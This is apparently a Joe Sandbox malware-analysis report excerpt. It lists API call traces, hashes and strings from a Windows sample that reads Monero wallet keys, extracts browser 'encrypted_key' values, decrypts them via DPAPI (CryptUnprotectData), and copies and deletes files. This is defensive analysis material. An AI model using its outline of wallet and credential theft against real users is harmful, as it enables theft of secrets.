                            • Opcode Fuzzy Hash: 989418a60de2a7c18fa9ae2b942aa5828938ecf609fa8b34ad01132874ba61df
                            • Instruction Fuzzy Hash: 5DE10C729502089ADB4CEBE4DC92EEF733AAF64340F50855CF516720D1EF346A49CB6A
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FD481
                            • lstrlen.KERNEL32(00000000), ref: 005FD698
                            • lstrlen.KERNEL32(00000000), ref: 005FD6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 005FD72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 184f6ad21d4d5b175266948276fe86c7590cc6a36b8a0d5ac22a3d8c44a88fc3
                            • Instruction ID: f72a0331156f864f5e69679e4e94c55633305ec2049a26f1c9c73aaece79b37c
                            • Opcode Fuzzy Hash: 184f6ad21d4d5b175266948276fe86c7590cc6a36b8a0d5ac22a3d8c44a88fc3
                            • Instruction Fuzzy Hash: EA911F719502089ADB4CEBE0DD96EEF733AAF54340F50856CF507A60D1EF346A09CB6A
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FD801
                            • lstrlen.KERNEL32(00000000), ref: 005FD99F
                            • lstrlen.KERNEL32(00000000), ref: 005FD9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 005FDA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: abc38cbb02c1aa08ff246989470e4a3986f406cf10a1c930b359b17e0d01bc5d
                            • Instruction ID: 7ff00ff2e51632b1d188b5f698d9cfc7f4617796a38087f546b7251911eb7569
                            • Opcode Fuzzy Hash: abc38cbb02c1aa08ff246989470e4a3986f406cf10a1c930b359b17e0d01bc5d
                            • Instruction Fuzzy Hash: E981ED719502089ADB4CEBE0DD96EEF733ABF54340F50851CF547A60D1EE346A09CB6A
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0060718C
                            • s`, xrefs: 00607111
                            • s`, xrefs: 006072AE, 00607179, 0060717C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: s`$s`$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 3722407311-2599111893
                            • Opcode ID: 06f1366c992aeb6a76cb83e032d96d6ac7e216589874198058bfdcf8bf92ca31
                            • Instruction ID: ff79174e02625838fdef1e3da63ce3d96b0ea60f20ac1cb0fe67fd7b1ca13346
                            • Opcode Fuzzy Hash: 06f1366c992aeb6a76cb83e032d96d6ac7e216589874198058bfdcf8bf92ca31
                            • Instruction Fuzzy Hash: C9518EB0D842089BDB58EB90DC85BEEB776AF44304F1480ACE205762C1EB746E89CF59
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: f69c774ce94a6f54efaa07c71f5a475236e921d191d12da43597d6257073b0bf
                            • Instruction ID: 1ace54654866d1be962fcf58be77e09b95d5e2bbbd74f086dace84c8834f185e
                            • Opcode Fuzzy Hash: f69c774ce94a6f54efaa07c71f5a475236e921d191d12da43597d6257073b0bf
                            • Instruction Fuzzy Hash: 0D415C75D50209AFDF08EFE4D845AEFB77AAB44304F008418E412762D0EB75AA46CFA6
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 005F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                              • Part of subcall function 005F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                              • Part of subcall function 005F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                              • Part of subcall function 005F99C0: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                              • Part of subcall function 005F99C0: LocalFree.KERNEL32(005F148F), ref: 005F9A90
                              • Part of subcall function 005F99C0: CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                              • Part of subcall function 00608E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005F9D39
                              • Part of subcall function 005F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9AEF
                              • Part of subcall function 005F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005F4EEE,00000000,?), ref: 005F9B01
                              • Part of subcall function 005F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9B2A
                              • Part of subcall function 005F9AC0: LocalFree.KERNEL32(?,?,?,?,005F4EEE,00000000,?), ref: 005F9B3F
                              • Part of subcall function 005F9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005F9B84
                              • Part of subcall function 005F9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 005F9BA3
                              • Part of subcall function 005F9B60: LocalFree.KERNEL32(?), ref: 005F9BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: a512c5286a779967e69f6c4e28042d8f6b09c6ebd5e3154bd6e641335abf4e00
                            • Instruction ID: c56094e355ff2405e4fb4f40a69a141f019fe9636d6c81e1db5988718b403f4f
                            • Opcode Fuzzy Hash: a512c5286a779967e69f6c4e28042d8f6b09c6ebd5e3154bd6e641335abf4e00
                            • Instruction Fuzzy Hash: 363110B5D1020DABCB04EBE4DC85BFFBBB9BB48304F144519EA05A7241E7349A44CBA5
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006105B7), ref: 006086CA
                            • Process32First.KERNEL32(?,00000128), ref: 006086DE
                            • Process32Next.KERNEL32(?,00000128), ref: 006086F3
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • CloseHandle.KERNEL32(?), ref: 00608761
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 36de9ed0d4310b187b7429ee43a8027356eeddd3f82d7556216797b4e9dd9c89
                            • Instruction ID: 9c4ee332ff7790cb19471bafea92026ebb86b64db4aa09647db03f88bc7fc7b9
                            • Opcode Fuzzy Hash: 36de9ed0d4310b187b7429ee43a8027356eeddd3f82d7556216797b4e9dd9c89
                            • Instruction Fuzzy Hash: 46315971951218ABDB68DB90CC85FEFB77AFB44740F1085A9A10AA21E0DB706A45CFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00610E00,00000000,?), ref: 006079B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006079B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00610E00,00000000,?), ref: 006079C4
                            • wsprintfA.USER32 ref: 006079F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: bd3f2f12a224ee21e3dbb505ed25a81bf06b8b2ef5402784fefc82fc11826a05
                            • Instruction ID: c5deaeb271ee4cb99ec33198759170a81e2dcff184c5119a2be937f00b7bac93
                            • Opcode Fuzzy Hash: bd3f2f12a224ee21e3dbb505ed25a81bf06b8b2ef5402784fefc82fc11826a05
                            • Instruction Fuzzy Hash: 981115B2944118AACB18DFC9DD45BBEB7F8FB88B11F10461AF645A2280E2395940CBB1
                            APIs
                            • __getptd.LIBCMT ref: 0060C74E
                              • Part of subcall function 0060BF9F: __amsg_exit.LIBCMT ref: 0060BFAF
                            • __getptd.LIBCMT ref: 0060C765
                            • __amsg_exit.LIBCMT ref: 0060C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0060C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 4af147fd92ea2897101573cbf0fd03a02626143419257a7fd5e947578d60aa72
                            • Instruction ID: 5596c2079e8d225937d570685be368a55add23e6e7896eb405e20ac2a6935351
                            • Opcode Fuzzy Hash: 4af147fd92ea2897101573cbf0fd03a02626143419257a7fd5e947578d60aa72
                            • Instruction Fuzzy Hash: E0F090329C07019BD7A8BFB85807B8F33A3AF00730F24924DF415A72D2DB6459419E5E
                            APIs
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00604F7A
                            • lstrcat.KERNEL32(?,00611070), ref: 00604F97
                            • lstrcat.KERNEL32(?,01408B70), ref: 00604FAB
                            • lstrcat.KERNEL32(?,00611074), ref: 00604FBD
                              • Part of subcall function 00604910: wsprintfA.USER32 ref: 0060492C
                              • Part of subcall function 00604910: FindFirstFileA.KERNEL32(?,?), ref: 00604943
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,00610FDC), ref: 00604971
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,00610FE0), ref: 00604987
                              • Part of subcall function 00604910: FindNextFileA.KERNEL32(000000FF,?), ref: 00604B7D
                              • Part of subcall function 00604910: FindClose.KERNEL32(000000FF), ref: 00604B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 665daac4ba21e870186917f01ded518f35694624433468d330051da67c182a1f
                            • Instruction ID: d545b419ce1de1891b247de87510c22b1713bf70c5e9bef6de8a7ff7542bb51b
                            • Opcode Fuzzy Hash: 665daac4ba21e870186917f01ded518f35694624433468d330051da67c182a1f
                            • Instruction Fuzzy Hash: B5219B76940208ABC758F7B0DC46EEA333DBB94300F004958B6DA571C1EE7596C88F96